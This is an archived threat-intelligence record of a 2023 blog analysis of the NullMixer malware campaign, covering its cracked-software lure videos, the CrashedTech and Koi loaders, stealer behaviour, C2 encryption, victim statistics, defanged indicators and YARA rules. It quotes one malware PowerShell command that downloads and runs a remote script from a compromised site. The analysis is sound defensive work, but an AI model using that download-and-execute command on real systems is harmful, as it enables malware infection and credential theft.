{ "id": "1239a9e5-a733-44b5-b00a-8808037607b1", "created_at": "2026-04-06T01:32:10.496232Z", "updated_at": "2026-04-10T03:35:16.525644Z", "deleted_at": null, "sha1_hash": "46d06cf61405b37eef9bb5be6a97f900450b51bc", "title": "Updates from the MaaS: new threats delivered through NullMixer", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2794760, "plain_text": "Updates from the MaaS: new threats delivered through NullMixer\r\nBy L M\r\nPublished: 2023-03-28 · Archived: 2026-04-06 00:28:38 UTC\r\n15 min read\r\nMar 27, 2023\r\nPress enter or click to view image in full size\r\nExecutive Summary\r\nOur insights into a recent NullMixer malware operation revealed Italy and France are the favorite European\r\ncountries from the opportunistic attackers’ perspective.\r\nIn thirty days, the operation we monitored was capable to establish initial access to over 8 thousand\r\nendpoints and steal sensitive data that are now reaching the underground black markets.\r\nMost of the victims mount Windows 10 Professional and Enterprise operating systems, including several\r\nDatacenter versions of Windows Server. Some of them are also Windows Embedded, indicating the\r\npenetration of such malware operation even into IoT environments.\r\nThe NullMixer package is including new polymorphic loaders by third parties MaaS and PPI service\r\nproviders in the underground markets, and also pieces of controversial, potentially North-Korean linked\r\nPseudoManuscript code.\r\nhttps://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1\r\nPage 1 of 16\n\nIntroduction\r\nDuring March 2023, we obtained information and data regarding an ongoing malware operation hitting more than\r\n8.000 targets within a few weeks, with a particular emphasis on North American, Italian, and French targets.\r\nSuch was related to a worldwide malware operation known as NullMixer, a controversial and widespread malware\r\ndelivery maneuver based on SEO poisoning and social engineering technique to lure tech-savvy users, including\r\nIT personnel.\r\nThe insight from this attack wave revealed the presence of a controversial piece of code in the delivered payloads,\r\namong additional loaders related to new MaaS and PPI operators.\r\nTechnical Analysis\r\nThere are two main key areas we technically analyzed during this investigation: first of all the presence of two\r\nunknown loaders entering the MaaS and PPI businesses (CrashedLoader and Koi), along with the presence of a\r\ncontroversial, potentially North-Korean linked piece of malware, and secondly, we analyzed data about current\r\nsuccessful infection rates on targeted hosts.\r\nThe Originating Malvertising Campaign\r\nAccording to CTI investigation on the adversary infrastructure, we were able to identify an ongoing campaign\r\nluring system administrators to install the malicious code into their machines. In particular, the identified attack\r\nwave was designed to trick users to install backdoored, cracked versions of notorious PC maintenance software\r\nsuch as “EaseUS Partition Master” and “Driver Easy Pro”, two well-known tools within the IT community.\r\nFilename: Driver Easy Pro Crack.exe\r\nMD5: 324db70fad161852fb9a12b202b6c8ad\r\nInvestigations end up in a series of Youtube videos promoting cracks for such programs. One of them presented a\r\nmasked, hooded male hacker explaining how to use the crack linked in the video description. The threat actor\r\nabused Bitly shortener and an ad hoc BlogSpot account to protect the malicious code, lastly stored in an encrypted\r\nzip archive hosted on Mega.nz.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1\r\nPage 2 of 16\n\nFigure. The final download link is presented on BlogSpot\r\nThis particular modus operandi matches a particular threat Kaspersky researchers spotted in September 2022\r\n(link): NullMixer. NullMixer is a worldwide spread criminal operation designed to provide infection services to an\r\noodle of criminal threat actors. In fact, its operators packed a multitude of malware into a single vector and then\r\nabused social engineering, SEO poisoning, and malvertising techniques to lure their victims into running their\r\npayloads.\r\nNullMixer is maintaining the same lure topic since September 2022, advertising fake software pirate cracks\r\ntargeting tech-savvy users and potentially even IT personnel and freelancers.\r\nDuring their March 2023 infection wave, they evolved their social engineering techniques by producing the\r\nabove-mentioned YouTube videos containing instructions to download and run the backdoored pirate software.\r\nFigure. NullMixer video operator\r\nDespite that evolution, NullMixer’s initial payload remains substantially the same: a WinRAR executable archive\r\ncontaining multiple binaries configured to be auto-launched on click. All at the same time.\r\nhttps://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1\r\nPage 3 of 16\n\nFigure. Contents of the NullMixer executable\r\nThis plethora of malicious code related to different threat actors gives us the chance to better understand the\r\nevolutions in the cybercriminal underground. In fact, aside from the well-known off-the-shelf info stealer we also\r\nobserved the presence of more peculiar pieces of code, including other unconventional malware loader services.\r\nCrack.exe, likely a “PseudoManuscrypt” loader, a particular kind of threat known since June 2021 that\r\nKaspersky attributes to the Chinese threat landscape, but, at the moment, the speculation of the Lazarus\r\n(APT38) authorship of this piece of code does not benefit enough confidence (link, link).\r\nBrg.exe, a common RacconStealer with its command and control server hosted by VDSina, a Russian\r\ncloud provider.\r\nLower.exe, a sample of “GCleaner” spyware, historically, this piece of malware was initially faking\r\nCCleaner to drop additional malware (link).\r\nSqlcmd.exe, an interesting information stealer and dropper leveraging custom ECC cryptography to secure\r\nits communication (details below)\r\nKiffAppE2.exe, Crashtech Loader, a new loader service operating since November 2022, malware details\r\nin the following subsection.\r\nss29.exe, a particular dropper loading a Fabookie wallet stealer retrieved from a jpeg image, also leverages\r\na google cloud endpoint to serve malicious PAC files to configure interception using an external HTTP\r\nproxy (T1090.002)\r\nThe following subsections will highlight some of the above-mentioned samples, especially the loader ones to aim\r\nfor a better understanding of the current MaaS landscape.\r\nThe CrashedTech Loader\r\nThe “KiffAppE2.exe” file is worth mentioning because it works as a secondary loader. This loader appeared in the\r\nsecurity community in November 2022 thanks to @fr3dhk, which gave it its current name “CrashedTech Loader”\r\nand its panel has already been added to the “What Is This C2” collection (link).\r\nFilename: KiffAppE2.exe\r\nHash: 53f9c2f2f1a755fc04130fd5e9fcaff4\r\nThe “KiffAppE2.exe” file is a .NET binary masking the loader code in plain sight, basically, it launches the loader\r\ncode before showing the application form. It also checks a particular registry key “KiffAppApi” under the HKCU\r\nhive to make sure the victim has not been already infected, reasonably this would likely hurt the actor PPI model.\r\nhttps://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1\r\nPage 4 of 16\n\nFigure. Loader entry point\r\nThe loader code is pretty straightforward its main logic consists of two steps. First, it does a check-in providing\r\nuser-name, os version, and public IP information to the “/addnew.php” endpoint on the C2, then it parses the\r\nserver response to extract the location where to download further payloads. After this, it downloads the payload\r\nand executes it through the “Process.Start” .NET API.\r\nPress enter or click to view image in full size\r\nFigure. Loader checking and launch body\r\nDuring March 2023, this particular loader was dropping at least two distinct RedLine Stealer payloads configured\r\nto connect back to C2 servers hosted by the Ukrainian hosting provider Timehost.\r\nThe “Koi” Stealer/Loader\r\nhttps://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1\r\nPage 5 of 16\n\nAnother interesting piece of malware embedded in the NullMixer campaign we reference as ATK-16 is the\r\n“sqlcmd.exe” binary, a 32bit MSVC binary.\r\nFilename: sqlcmd.exe\r\nHash: 6ffbbca108cfe838ca7138e381df210d\r\nAt a high level, the main routine of this loader does two things: insistently tries to download multiple executable\r\nfiles with the name pattern “ab[NUMBER].php” and “ab[NUMBER].exe” from a statically configured location,\r\nand runs an additional inline PowerShell command to download and execute more code.\r\nPress enter or click to view image in full size\r\nFigure. Command string to retrieve executable PowerShell code\r\n“C:\\WINDOWS\\sysnative\\cmd.exe” /c “powershell -command IEX(New-Object\r\nNet.Webclient).DownloadString(‘https://neutropharma .com/wp/wp-content/debug2.ps1’)”\r\nThis particular sample of the loader downloads the PowerShell script from a Pakistani compromised WordPress\r\nsite. The typical names we observed to be downloaded are “debug2.ps1”, “debug20.ps1”, “debug4.ps1” and so on.\r\nThe downloaded script contains a long chunk of bytes and a sort of decryption routine base on a textbook-looking\r\nxor operation, after that, the resulting bytes are loaded as a .NET assembly module.\r\nPress enter or click to view image in full size\r\nFigure. Binary encoded data inside PowerShell and decryption routine.\r\nThe key to decrypting the embedded code is served through an external check-in service, implementing a multi-stage polymorphic protection scheme. Such initial C2 service also provides additional malware configuration\r\nincluding campaign Id and additional command and control locations.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1\r\nPage 6 of 16\n\nFigure. Dynamic configuration served by the C2\r\nDuring March 2023, the resulting binary is a .NET file packed with ConfuseEx v1.0.0. Once decoded, the\r\nmalicious payload results in a .NET module named “koi” and implements information stealer functionalities such\r\nas password stealing from FileZilla, Chrome browser, and Discord, crypto-wallets stealing, Telegram folder\r\nexfiltration, Vpn configurations, and it also looks for the presence of hardware wallet like Trezor, probably to\r\nidentify high-value targets for cryptocurrency theft. The module also exfiltrates 2FA secrets from Twilio’s Authy\r\nlocal storage.\r\nFilename: “koi” (dumped)\r\nHash: 9725ec075e92e25ea5b6e99c35c7aa74\r\nBefore starting all these collection operations, the “koi” module invokes the “checkVal” function to avoid\r\nunwanted targets. In particular, it uses mutex “99759703-b8b4–4cb2–8329–76f908b004f0” to avoid re-infection\r\nand also checks for the presence of video controller of the Wine emulation framework, along with common user\r\nnames and computer names used by sandboxes or by AV emulation routines.\r\nPress enter or click to view image in full size\r\nFigure. Basic defense evasion checks\r\nThe module also avoids the execution of the malicious stealer routines if the system language is set to one of the\r\nvalues representing the CIS countries:\r\nAZ: Azerbaijan\r\nAM: Armenia\r\nBY: Belarus\r\nKZ: Kazakhstan\r\nKG: Kyrgyzstan\r\nMD: Moldova\r\nRU: Russia\r\nTJ: Tajikistan\r\nTM: Turkmenistan\r\nUZ: Uzbekistan\r\nhttps://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1\r\nPage 7 of 16\n\nFigure. CIS countries check\r\nAfter that, the “koi” module starts gathering information about system installed software and sets up a\r\ncommunication channel with the command and control service received as a startup parameter, in this case, the\r\nLatvian IP address 195.123.211,56.\r\nGet L M’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nThis malware communicates with its command and control in a curious manner: it redirects certain memory\r\nstreams directly to the remote server, this way, malware authors were able to avoid touching the disk even to lay\r\ntemporary data before exfiltration. The first message sent to the C2 starts with the “CONFIG|” keyword and\r\ncontains check-in information among with the campaign Id passed to the module via its PowerShell loader. Then,\r\nC2 triages the infected host and responds in two possible ways: if “D” is returned, the “koi” module stops its\r\noperations, otherwise, the command would contain additional commands and the malicious code starts gathering\r\neven more data from the infected host.\r\nIn detail, a valid response from the C2 server would look like this:\r\nLDR “|” (DO|AND|OR) “|” (On|Off) “|” ( list “,” list “,” .. ) “|” url “|” suffix\r\nHere the C2 server asks the bot to download and execute an additional payload from the remote location specified\r\nas “url”.\r\nAll these communications happen in plain HTTP, but despite that, messages are not easy to spot because the “koi”\r\nmodule encrypts messages using a custom protocol based on ECC encryption.\r\nFigure. Classes in the “koi” module\r\nhttps://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1\r\nPage 8 of 16\n\nIn fact, the C2 communication leverages custom implementation ECC with Curve25519 to generate a shared\r\nsecret key that would be used to encrypt the otherwise plain HTTP body. In particular, the communication\r\nprotection scheme of this piece of malware works as follows:\r\nThe server “peer-key” is hardcoded into the packed .NET module’s Main function.\r\nBots “public-key” and “private-key” are randomly generated at process startup time.\r\nA shared secret is computed starting from the bots’ “private-key” and the server’s “peer-key”.\r\nThe shared secret is used to encrypt the GZipped memory stream using a xor-based algorithm in a\r\ncompress-then-encrypt fashion.\r\nPress enter or click to view image in full size\r\nFigure. Shared Secret methods from Curve25519 implementation\r\nTo make all this work, the final message sent to the C2 server will also need to contain the bot “public-key” and\r\nhere a detection opportunity emerges: the HTTP body of the generated request is created concatenating 32 bytes of\r\nthe randomly generated bot “public-key”, a static separator “K”, and then the encrypted stream.\r\nPress enter or click to view image in full size\r\nFigure. Message encryption routine\r\nAttack Wave Insights\r\nBased on the analysis of the C2 infrastructures involved in this NullMixer wave (ATK-16), we obtained insights\r\nabout successfully infected hosts. In particular, we were able to obtain evidence of the successful execution of at\r\nleast one of the payloads within the target machines.\r\nhttps://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1\r\nPage 9 of 16\n\nThe NullMixer operations we dissected (ATK-16) count victims in at least 87 countries. With an average\r\ninfraction rate of 297 new victims per day, the malicious actors behind hit over 8 thousand in less than 30 days.\r\nPeaks of operations show an intensification of the activities starting from the 28th of February 2023 when the\r\ninfection rate jumped sensibly higher.\r\nPress enter or click to view image in full size\r\nFigure. Reconstruction of the infection operations activities.\r\nImpacted Countries\r\nDuring the March spike period, the malicious operators significantly expanded their campaign among countries\r\noutside North America: this wave hit many European countries including Italy (4.57%, in fourth position) and\r\nFrance (3.38%, in sixth position).\r\nPress enter or click to view image in full size\r\nFigure. Target map of the ATK-16\r\nStarting from the infected hosts’ data available, the infection progression shows the clear horizontal expansion of\r\nthe attacked surface corresponding to the above-mentioned peak on the 28th of February.\r\nhttps://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1\r\nPage 10 of 16\n\nPress enter or click to view image in full size\r\nFigure. Infected host timeline per country\r\nTarget Profile\r\nAs we expected the majority of the targeted hosts mount Microsoft client operations systems: 56.8 % Windows 10\r\nPro and 25.35 % Windows 10 Home, indicating major of the targets are micro or small businesses or private users.\r\nDespite that, we noticed interesting outliers, 5.3 % of the victims mount the Enterprise version of the Microsoft\r\nOS, and almost 71 hosts also mount the Windows Server version of the Microsoft operating system.\r\nThe majority of the data extracted from the victims will likely reach the underground dark markets soon, but for\r\nthis latest portion of infected hosts the risk is even higher: the operator will likely try to sell access to these servers\r\nand enterprise machines to even more dangerous thirds parties, including well-known ransomware operators.\r\nhttps://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1\r\nPage 11 of 16\n\nFigure. Operating systems of infected machines\r\nIn the end, we also noticed that five machines that got infected were running even a rarer version of the Microsoft\r\noperating system: Windows Embedded, an indication that even Windows-based IoT devices have been hit by this\r\ncampaign.\r\nConclusions\r\nAfter 9 months, the NullMixer operation evolved leveraging malicious video tutorials increasing its penetration on\r\ntech-savvy users and revealing new potential players in the MaaS ecosystems.\r\nThe data we accessed during this investigation lighted up the impacted victims of their latest campaign, revealing\r\nItaly as the first European target hit by the March 2023 infection wave. During the recent period, Italy has been\r\nheavily targeted by cyber attacks, especially from young collectives of cyber-partisans supporting the Kremlin’s\r\npropaganda such as Killnet and NoName057. Such criminals base their operations on volunteer and micro-criminal labor forces typically among the eastern CIS countries, for this reason, a spike observing such penetration\r\nhttps://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1\r\nPage 12 of 16\n\nagainst Italian hosts becomes particularly interesting, especially with the current geopolitical and cyber\r\ntemperature against the Italian peninsula.\r\nTechnical details of the victims, adversary infrastructure, and indicators of compromise have been shared with\r\nlocal authorities and the national CSIRT.\r\nIndicator of Compromise\r\n[ATK-16]\r\nMalvertising:\r\ns://www.youtube.com/watch?v=67UdCa9AbPA\r\nDropurl:\r\ns://bit.ly/3IqujMB\r\ns://crackfinddownload.blogspot.com/2023/02/your-download-link-httpswww.html\r\ns://mega.nz/file/SRgjGSpL#wDXn2ER24p_e43NwPOtQaa - EelC5MNO5iVhC3CGcuc (5123)\r\nEmbeddings:\r\nb2efceab3748f46e64091e87b1767abf brg.exe\r\ne299ac0fd27e67160225400bdd27366f Crack.exe\r\n53f9c2f2f1a755fc04130fd5e9fcaff4 KiffAppE2.exe\r\naaa7586b2e64363b85571195a01b14e9 lower.exe\r\n6ffbbca108cfe838ca7138e381df210d sqlcmd.exe\r\nc4ffe80effddba0b8d9f82988464c5d0 ss29.exe\r\nC2 (Crashedtech loader):\r\nttp://crashedff.xyz/addnew.php\r\n47.90.167,104\r\nC2 (Redline):\r\nhrabrlonian,xyz:81\r\n45.130.151,133\r\nC2 (Fabookie Stealer):\r\ncount.iiagjaggg .com\r\n154.221.31,191\r\nttp://34.80.59,191/win.pac\r\nttp://34.80.59,191:8183/\r\nC2 (koi Stealer/Loader):\r\nttp://195.123.211,56/index.php\r\nC2 (PseudoManuscrypt):\r\ns://j.ffbbjjkk,com/25.html\r\ns://j.ffbbjjkk,com/logo.png\r\ns://h.ffbbhhtt,com/api6.php\r\nC2 (gcleaner):\r\nttp://45.12.253,56/advertisting/plus.php\r\nhttps://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1\r\nPage 13 of 16\n\n45.12.253,56\r\n45.12.253,72\r\n45.12.253,98\r\nC2 (Raccon Stealer):\r\nttp://91.201.115,148\r\nMutex (koi):\r\nGlobal\\\\99759703-b8b4–4cb2–8329–76f908b004f0\r\nYara Rules\r\nrule crashedtech_loader {\r\n meta:\r\n author = \"@luc4m\"\r\n date = \"2023-03-26\"\r\n hash_md5 = \"53f9c2f2f1a755fc04130fd5e9fcaff4\"\r\n link = \"https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixe\r\n tlp = \"WHITE\"\r\n strings:\r\n $trait_0 = {02 14 7d ?? ?? ?? ?? 02 28 ?? ?? ?? ?? ?? ?? 02 28 ?? ?? ?? ?? ?? 2a}\r\n $trait_1 = {?? 02 7b ?? ?? ?? ?? 6f ?? ?? ?? ?? ?? ?? 02 03 28 ?? ?? ?? ?? ?? 2a}\r\n $trait_2 = {?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 7e ?? ?? ?? ?? 6f ?? ?? ?? ?? 0a 2b ??}\r\n $trait_4 = {?? 73 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0a 2b ??}\r\n $trait_5 = {06 6f ?? ?? ?? ?? ?? dc ?? de ?? 26 ?? ?? de ?? 2a}\r\n $trait_6 = {11 ?? 6f ?? ?? ?? ?? ?? dc 09 6f ?? ?? ?? ?? 16 fe 01 13 ?? 11 ?? 2c ??}\r\n $trait_7 = {06 6f ?? ?? ?? ?? ?? dc ?? de ?? 26 ?? ?? de ?? 2a}\r\n $trait_8 = {?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0a 28 ?? ?? ?? ?? 06 6f ?? ?? ?? ?? 0b 2b ??}\r\n $str_0 = \"username\" wide\r\n $str_1 = \"windows\" wide\r\n $str_2 = \"client\" wide\r\n $str_3 = \"ip\" wide\r\n $str_4 = \"api.ipify.org\" wide\r\n $str_5 = \"(.*)\u003c\u003e(.*)\" wide\r\n condition:\r\n 5 of ($str_* ) and 3 of ($trait_*)\r\n}\r\nrule sqlcmd_loader {\r\n meta:\r\n author = \"@luc4m\"\r\n date = \"2023-03-26\"\r\n hash_md5 = \"6ffbbca108cfe838ca7138e381df210d\"\r\n link = \"https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixe\r\n tlp = \"WHITE\"\r\nhttps://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1\r\nPage 14 of 16\n\nstrings:\r\n $trait_0 = {33 c9 85 ff 0f 9f c1 8d 0c 4d ?? ?? ?? ?? 85 c9 0f 85 ec 04 00 00}\r\n $trait_1 = {85 ff 0f 9f c1 8d 0c 4d ?? ?? ?? ?? 85 c9 0f 85 9f 04 00 00}\r\n $trait_2 = {33 c9 85 ff 0f 9f c1 8d 0c 4d ?? ?? ?? ?? 85 c9 0f 85 7d 04 00 00}\r\n $trait_3 = {33 c9 85 ff 0f 9f c1 8d 0c 4d ?? ?? ?? ?? 85 c9 0f 85 5b 04 00 00}\r\n $trait_4 = {6a 20 59 2b d9 03 f1 03 d1 3b d9 0f 83 5f fb ff ff}\r\n $trait_5 = {33 c9 85 ff 0f 9f c1 8d 0c 4d ?? ?? ?? ?? 85 c9 0f 85 e3 03 00 00}\r\n $trait_6 = {33 c9 85 ff 0f 9f c1 8d 0c 4d ?? ?? ?? ?? 85 c9 0f 85 c1 03 00 00}\r\n $trait_7 = {33 c9 85 ff 0f 9f c1 8d 0c 4d ?? ?? ?? ?? 85 c9 0f 85 9f 03 00 00}\r\n $trait_8 = {33 c9 85 ff 0f 9f c1 8d 0c 4d ?? ?? ?? ?? 85 c9 0f 85 4c 03 00 00}\r\n $trait_9 = {33 c9 85 ff 0f 9f c1 8d 0c 4d ?? ?? ?? ?? 85 c9 0f 85 2a 03 00 00}\r\n $str_0 = /debug[0-9]{1,3}\\.ps1/i wide\r\n $str_1 = \"%s\\\\\\\\sysnative\\\\\\\\%s\" wide\r\n $str_2 = \"/c \\\\\\\"powershell \" wide\r\n $str_3 = \"%s/ab%d.exe\" wide\r\n $str_4 = \"%s/ab%d.php\" wide\r\n condition:\r\n (5 of ($trait_*)) and (3 of ($str_*))\r\n}\r\nrule koi_loader {\r\n meta:\r\n author = \"@luc4m\"\r\n date = \"2023-03-26\"\r\n link = \"https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixe\r\n hash_md5 = \"9725ec075e92e25ea5b6e99c35c7aa74\"\r\n tlp = \"WHITE\"\r\n strings:\r\n $tm_0 = /debug[0-9]{1,3}\\.ps1/i wide\r\n $tm_1 = \"First stage size: {0}\" wide\r\n $tm_2 = \"Second stage size: {0}\" wide\r\n $tm_3 = \"Telegram Desktop\\\\tdata\" wide\r\n $tm_4 = \"Executed \" wide\r\n $tm_5 = \" or downloading \" wide\r\n $tm_6 = \"LDR\" wide\r\n $curve_0 = \"key must be 32 bytes long (but was {0} bytes long)\" wide\r\n $curve_1 = \"rawKey must be 32 bytes long (but was {0} bytes long)\" wide\r\n $curve_2 = \"rawKey\" wide\r\n $curve_3 = \"key\" wide\r\n condition:\r\n (5 of ($tm_*)) and (1 of ($curve_*))\r\n}\r\nrule fabookie_stealer {\r\n meta:\r\nhttps://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1\r\nPage 15 of 16\n\nauthor = \"@luc4m\"\r\n date = \"2023-03-26\"\r\n link = \"https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixe\r\n hash_md5 = \"901ce391f5d25a12282e7ff436a5e62a\"\r\n tlp = \"WHITE\"\r\n strings:\r\n $trait_0 = {48 89 5c 24 ?? 48 89 74 24 ?? 57 48 83 ec 20 49 8b f8 8b da 48 8b f1 83 fa 01 75\r\n $trait_1 = {48 89 48 ?? 48 8b 41 ?? 49 89 41 ?? 48 8b 07 48 3b 48 ?? 75 06}\r\n $trait_2 = {4c 89 48 ?? 49 89 09 4c 89 49 ?? 48 8b 42 ?? 40 38 70 ?? 0f 84 3b fe ff ff}\r\n $trait_3 = {49 8b 42 ?? c6 40 ?? ?? 48 8b 5c 24 ?? 49 8b c0 48 8b 74 24 ?? 48 8b 7c 24 ?? c3}\r\n $trait_4 = {83 67 ?? ?? 48 8b 5c 24 ?? 48 c7 47 ?? ?? ?? ?? ?? c6 07 00 48 83 c4 20 5f c3}\r\n $trait_5 = {83 67 ?? ?? 48 8b 5c 24 ?? 48 c7 47 ?? ?? ?? ?? ?? c6 07 00 48 83 c4 20 5f c3}\r\n $trait_6 = {4c 8b 41 ?? 48 83 c2 27 49 2b c8 48 8d 41 ?? 48 83 f8 1f 77 44}\r\n $trait_7 = {18 e8 be e0 00 00 48 8b 4b ?? e8 a5 5d 04 00 48 8d 05 ?? ?? ?? ?? 48 89 03 40 f6\r\n $trait_8 = {ba 30 00 00 00 48 8b cb e8 98 e0 00 00 48 8b c3 48 8b 5c 24 ?? 48 83 c4 20 5f c3}\r\n $trait_9 = {4d 30 e8 65 4f f8 ff 90 ?? ?? ?? ?? 39 70 ?? 72 03}\r\n condition:\r\n 5 of them\r\n}\r\nMany thanks to @3rb3ru5d3d53c for binlex!\r\nSource: https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1\r\nhttps://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1\r\nPage 16 of 16", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1" ], "report_names": [ "updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1" ], "threat_actors": [ { "id": "4f472ea8-b147-486d-8533-88f8036343a6", "created_at": "2024-01-23T13:22:35.081084Z", "updated_at": "2026-04-10T02:00:03.520098Z", "deleted_at": null, "main_name": "Cyber Partisans", "aliases": [], "source_name": "MISPGALAXY:Cyber Partisans", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b4a6d558-3cba-499c-b58a-f15d65b7a604", "created_at": "2023-01-06T13:46:39.346924Z", "updated_at": "2026-04-10T02:00:03.295317Z", "deleted_at": null, "main_name": "Killnet", "aliases": [], "source_name": "MISPGALAXY:Killnet", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "b05a0147-3a98-44d3-9b42-90d43f626a8b", "created_at": "2023-01-06T13:46:39.467088Z", "updated_at": "2026-04-10T02:00:03.33882Z", "deleted_at": null, "main_name": "NoName057(16)", "aliases": [ "NoName057", "NoName05716", "05716nnm", "Nnm05716" ], "source_name": "MISPGALAXY:NoName057(16)", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f426f0a0-faef-4c0e-bcf8-88974116c9d0", "created_at": "2022-10-25T15:50:23.240383Z", "updated_at": "2026-04-10T02:00:05.299433Z", "deleted_at": null, "main_name": "APT38", "aliases": [ "APT38", "NICKEL GLADSTONE", "BeagleBoyz", "Bluenoroff", "Stardust Chollima", "Sapphire Sleet", "COPERNICIUM" ], "source_name": "MITRE:APT38", "tools": [ "ECCENTRICBANDWAGON", "HOPLIGHT", "Mimikatz", "KillDisk", "DarkComet" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775439130, "ts_updated_at": 1775792116, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/46d06cf61405b37eef9bb5be6a97f900450b51bc.pdf", "text": "https://archive.orkl.eu/46d06cf61405b37eef9bb5be6a97f900450b51bc.txt", "img": "https://archive.orkl.eu/46d06cf61405b37eef9bb5be6a97f900450b51bc.jpg" } }